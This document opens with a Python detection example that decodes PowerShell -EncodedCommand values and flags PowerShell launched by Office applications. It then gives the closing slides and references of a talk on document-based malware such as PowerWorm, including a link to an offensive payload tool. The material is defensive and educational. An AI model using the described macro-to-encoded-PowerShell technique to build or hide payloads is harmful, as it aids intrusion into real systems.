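An added example in Python, not from the talk or from the PowerWorm analysis it cites: the value after -encodedcommand is base64 over the UTF-16LE bytes of the script, so a responder can decode it straight from process-creation telemetry without executing anything. The code pairs that decoder with the behavioural check that catches this worm whatever the payload says: powershell.exe started by an Office parent process. The event records and the script inside them are constructed sample data, and the ParentImage/Image/CommandLine field names are an assumption about the log format (Sysmon-style naming).

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters> <base64>" and check the prefix against the full switch name.
_ENC_FLAG = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe"}


def encode_powershell_command(script: str) -> str:
    """Build the -EncodedCommand form: base64 over the UTF-16LE bytes of the script.
    Used here only to construct the sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str):
    """Return the decoded script carried by -EncodedCommand (or an accepted abbreviation),
    or None when the command line has none or the value does not decode cleanly."""
    for m in _ENC_FLAG.finditer(cmdline):
        switch, b64 = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue                                  # e.g. -ExecutionPolicy
        b64 += "=" * (-len(b64) % 4)                  # tolerate stripped padding
        try:
            # binascii.Error and UnicodeDecodeError both derive from ValueError
            return base64.b64decode(b64, validate=True).decode("utf-16-le")
        except ValueError:
            return None
    return None


def triage_event(event: dict) -> dict:
    """Flag PowerShell launched by an Office parent and surface any encoded payload."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    decoded = extract_encoded_command(event["CommandLine"])
    reasons = []
    if image in POWERSHELL_IMAGES and parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office process {parent}")
    if decoded is not None:
        reasons.append("-EncodedCommand payload present")
    return {"suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


# Constructed process-creation records (not real telemetry); the script is a harmless stand-in.
SAMPLE_SCRIPT = "Write-Output 'constructed sample, not the worm payload'"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -noexit -encodedcommand " + encode_powershell_command(SAMPLE_SCRIPT)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage_event(event))
```

The decoder checks each -e... switch against the full switch name rather than matching -encodedcommand literally, because the abbreviated forms are what turn up in real command lines; an odd-length or malformed value yields None instead of a garbled string. The parent/child check is the part worth alerting on, since it holds even when the payload is re-encoded or the switch is spelled differently.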
CRIGENT / Powerworm
• Matt Graeber re-wrote, deobfuscated, and redacted some parts of the worm: https://github.com/mattifestation/PowerWorm
(Graeber, 2014)
Defense
Other Strategies
• Application whitelisting
• Network 'whitelisting' and segmentation
• Monitoring!
Conclusion
• Historically, document malware was popular and then fell out of fashion
• Recent resurgence in document malware downloaders
• Different formats utilized
• Bypass armoring of passwords and obfuscations
• Tools including pdfid, pdf-parser, olevba, and Microsoft's built-in debugger
• Cases
References
Aloria. (2015). Security Reactions. Retrieved from http://securityreactions.tumblr.com/
Carnal0wnage. (2011). Embeding A Link To A Network Share In A Word Doc. Retrieved from http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html
Chantry, G. (2015). From the Labs: New developments in Microsoft Office malware. Retrieved from https://nakedsecurity.sophos.com/2015/03/06/from-the-labs-new-developments-in-microsoft-office-malware/
Decalage. (2015). Python Tools to Analyze OLE files. Retrieved from http://www.decalage.info/python/oletools
DFIR.IT. (2015). Analyst's Handbook - Analyzing Weaponized Documents. Retrieved from https://dfir.it/blog/2015/06/17/analysts-handbook-analyzing-weaponized-documents/
Ducklin, P. (2015). Why Word malware is BASIC: SophosLabs takes apart a booby-trapped document. Retrieved from https://blogs.sophos.com/2015/09/28/why-word-malware-is-basic/
Gordon, S. (1995). What a (Winword.) Concept. Retrieved from https://www.virusbtn.com/pdf/magazine/1995/199509.pdf
Graeber, M. (2014). Analyzing the "Power Worm" PowerShell-based Malware. Retrieved from http://www.exploit-monday.com/2014/04/powerworm-analysis.html
Grooten, M. (2014). Macro malware on the rise again. Retrieved from https://www.virusbtn.com/blog/2014/11_07.xml
Grooten, M. (2015). Vawtrak trojan spread through malicious Office macros. Retrieved from https://www.virusbtn.com/blog/2015/02_24.xml
Inocencio, R. (2014). Banking Trojan DRIDEX Uses Macros for Infection. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Joostbijl. (2014). Cryptolocker variant Torrentlocker making new victims in NL. Retrieved from http://blog.fox-it.com/2014/11/06/cryptolocker-variant-torrentlocker-making-new-victims-in-nl/
Kennedy, D. (2015). Unicorn. Retrieved from https://github.com/trustedsec/unicorn
Levene, B., & Downs, R. (2015). Dridex is Back and Targeting the UK. Retrieved from http://researchcenter.paloaltonetworks.com/2015/10/dridex-is-back-and-targeting-the-uk/
Nieto, A. (2014). Word and Excel Files Infected Using Windows PowerShell. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/word-and-excel-files-infected-using-windows-powershell/
Ristow, M. (2015). CrunchCode: the obfuscator for VBA macros. Retrieved from http://www.crunchcode.de/en/index.html
Stevens, D. (2015). PDF + maldoc1 = maldoc2. Retrieved from https://isc.sans.edu/forums/diary/PDF+maldoc1+maldoc2/20079/
Stevens, D. (2015). PDF Tools. Retrieved from http://blog.didierstevens.com/programs/pdf-tools/
Szappanos, G. (2014). VBA is not dead. Retrieved from https://www.virusbtn.com/virusbulletin/archive/2014/07/vb201407-VBA
Talampas, C. (2015). Enterprises Hit by BARTALEX Macro Malware in Recent Spam Outbreak. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/enterprises-hit-by-bartalex-macro-malware-in-recent-spam-outbreak/
Trend Micro. (2015). Banking Malware VAWTRAK Now Uses Malicious Macros, Abuses Windows PowerShell. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/banking-malware-vawtrak-now-uses-malicious-macros-abuses-windows-powershell/
Whalley, I. (1999). Melissa: The Little Virus That Could... Retrieved from https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-throwback-thursday-Melissa
Whipple, J. R. (n.d.). The Melissa Computer Virus. Retrieved from http://www.jrwhipple.com/melissa.html
Yaneza, J. (2015). Macro Malware: When Old Tricks Still Work. Retrieved from https://blog.trendmicro.com/trendlabs-security-intelligence/macro-malware-when-old-tricks-still-work-part-1/
QUESTIONS? THANK YOU!
• @tylerhalfpop tylerhalfpop.com | @FidSecSys fidelissecurity.com